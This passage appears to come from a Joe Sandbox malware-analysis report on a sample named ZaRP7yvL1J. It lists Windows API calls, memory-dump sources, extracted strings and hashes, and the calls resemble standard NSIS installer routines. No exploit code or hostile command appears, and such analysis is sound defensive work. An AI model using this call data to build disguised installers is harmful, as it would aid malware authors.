                                                                                                            • Opcode Fuzzy Hash: a5ab397e5e501b393e8bfff38176ca22f2a7f880ea9bdadb3386dae1e738ba7e
                                                                                                            • Instruction Fuzzy Hash: 30C19074E01218CFDB54DFA5C994BADBBB2BF89300F2080A9D409BB365DB359A85CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2951850825.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_390e0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9fccf357d67bee1fa2b99f6fc24c3bce4a3c85ce945ad7e128e09465ff6aecd8
                                                                                                            • Instruction ID: 10f45840f634591b23783e875fadbbd528c29e814aca00c1c50ef42e0dedfdd9
                                                                                                            • Opcode Fuzzy Hash: 9fccf357d67bee1fa2b99f6fc24c3bce4a3c85ce945ad7e128e09465ff6aecd8
                                                                                                            • Instruction Fuzzy Hash: 2ED09E79E4422C8ACB11DF98D9402ECF771EBA9351F0024E6C14CB7110D7709A90CF55
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                            • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                              • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                            • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                            • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                            • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                            • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                            • EmptyClipboard.USER32 ref: 004058B7
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                            • CloseClipboard.USER32 ref: 00405912
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                            • String ID: (7B${
                                                                                                            • API String ID: 590372296-525222780
                                                                                                            • Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                            • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                            • Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                                                                                            • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                            • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                            • DestroyWindow.USER32 ref: 00403EF3
                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                            • EnableWindow.USER32(?,?), ref: 00404147
                                                                                                            • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                            • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                            • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                            • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                            • String ID: (7B
                                                                                                            • API String ID: 184305955-3251261122
                                                                                                            • Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                            • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                            • Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                                                                                            • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                                                                                            APIs
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,74DF3420,00435000,00000000), ref: 00403B59
                                                                                                            • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
                                                                                                            • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                            • GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                              • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                            • API String ID: 1975747703-1425696872
                                                                                                            • Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                            • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                            • Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                                                                                            • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D
                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                            • GetSysColor.USER32(?), ref: 004045FE
                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                            • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                            • SetCursor.USER32(00000000), ref: 00404720
                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                            • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                            • String ID: N
                                                                                                            • API String ID: 3103080414-1130791706
                                                                                                            • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                            • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                            • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                            • String ID: F
                                                                                                            • API String ID: 941294808-1304234792
                                                                                                            • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                            • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                            • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
                                                                                                            • lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                              • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                              • Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                              • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                              • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                              • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$A
                                                                                                            • API String ID: 2624150263-3645020878
                                                                                                            • Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                            • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                            • Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                                                                                            • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                            • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                            • wsprintfA.USER32 ref: 004060B3
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                            • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                                            • API String ID: 2171350718-461813615
                                                                                                            • Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                            • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                            • Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                                                                                            • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0040A230), ref: 004030F0
                                                                                                            Strings
                                                                                                            • Error launching installer, xrefs: 00402F80
                                                                                                            • Inst, xrefs: 00403017
                                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                                                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                                                                                            • Null, xrefs: 00403029
                                                                                                            • soft, xrefs: 00403020
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                            • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                            • API String ID: 2803837635-787788815
                                                                                                            • Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                            • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                            • Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                                                                                            • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
                                                                                                            • GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                            • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                            • lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                            Strings
                                                                                                            • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
                                                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                            • API String ID: 717251189-730719616
                                                                                                            • Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                                                                                            • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                            • Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
